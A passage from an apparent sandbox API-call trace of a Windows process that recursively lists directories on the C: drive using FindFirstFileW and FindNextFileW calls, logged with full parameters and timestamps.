ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0032.983] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37e0fa0 [0032.983] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.984] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.984] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0032.984] FindClose (in: hFindFile=0x3750b60 | out: hFindFile=0x3750b60) returned 1 [0032.984] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37e0fa0 | out: hHeap=0x5f0000) returned 1 [0032.984] FindNextFileW (in: hFindFile=0x6e2968, lpFindFileData=0x3a5fd00 | out: lpFindFileData=0x3a5fd00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0032.984] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37e0fa0 [0032.984] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="佘d\x16")) returned 0xffffffff [0032.985] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37e0fa0 | out: hHeap=0x5f0000) returned 1 [0032.985] FindNextFileW (in: hFindFile=0x6e2968, lpFindFileData=0x3a5fd00 | out: lpFindFileData=0x3a5fd00*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0032.985] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37e0fa0 [0032.985] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b60 [0032.985] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.985] FindNextFileW (in: hFindFile=0x3750b60, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0032.986] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.986] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e20e8 [0033.227] FindNextFileW (in: hFindFile=0x6e20e8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.230] FindNextFileW (in: hFindFile=0x6e20e8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0034.703] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.703] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bbccc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c2bbccc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc1486, dwReserved0=0x0, dwReserved1=0x0, cFileName="Alphabet.xml", cAlternateFileName="")) returned 1 [0034.703] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3ef2078 [0034.703] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.703] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.703] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe846a08f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe86330eb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe8659248, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0034.703] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.703] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ef2078 | out: hHeap=0x5f0000) returned 1 [0034.703] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0034.704] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3ef2078 [0034.704] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.704] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.704] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1207ac, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea335ac2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea35bc1f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0034.704] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.704] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ef2078 | out: hHeap=0x5f0000) returned 1 [0034.704] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90daefa5, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x90daefa5, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0034.704] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3ef2078 [0034.704] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.704] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.704] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ce8929, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6f23d9c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6f23d9c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0034.704] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.705] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ef2078 | out: hHeap=0x5f0000) returned 1 [0034.705] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0034.705] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3ef2078 [0034.705] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.705] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.705] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6fbc310, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe71ab4c9, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe71d1626, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0034.705] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.705] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ef2078 | out: hHeap=0x5f0000) returned 1 [0034.705] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0034.705] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3ef2078 [0034.705] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.706] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.706] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe728fcf7, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe74cb16a, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe74cb16a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0034.706] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.706] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ef2078 | out: hHeap=0x5f0000) returned 1 [0034.706] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0034.706] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3ef2078 [0034.706] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.706] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.706] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31667d9, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe337baef, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe337baef, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0034.707] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.707] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ef2078 | out: hHeap=0x5f0000) returned 1 [0034.707] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0034.707] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3ef2078 [0034.707] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.709] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.709] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a407849, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9a407849, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x9a407849, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, 